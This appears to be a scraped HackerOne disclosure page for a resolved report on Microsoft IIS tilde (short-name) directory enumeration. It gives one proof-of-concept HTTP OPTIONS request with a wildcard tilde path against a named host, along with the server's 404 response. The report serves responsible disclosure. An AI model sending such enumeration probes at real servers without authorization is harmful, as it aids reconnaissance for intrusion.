Microsoft IIS tilde directory enumeration

Disclosed: 2017-03-31 02:17:39 By linkks To radancy
Unknown
Vulnerability Details
Request OPTIONS //*~1*/a.aspx?aspxerrorpath=/ HTTP/1.1 Host: exactrd.maximum.nl Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36 Accept: */* Response HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.0 X-Powered-By: ASP.NET Date: Sat, 02 Jul 2016 00:35:22 GMT Content-Length: 1245
Actions
View on HackerOne
Report Stats
  • Report ID: 148777
  • State: Closed
  • Substate: resolved
  • Upvotes: 15
Share this report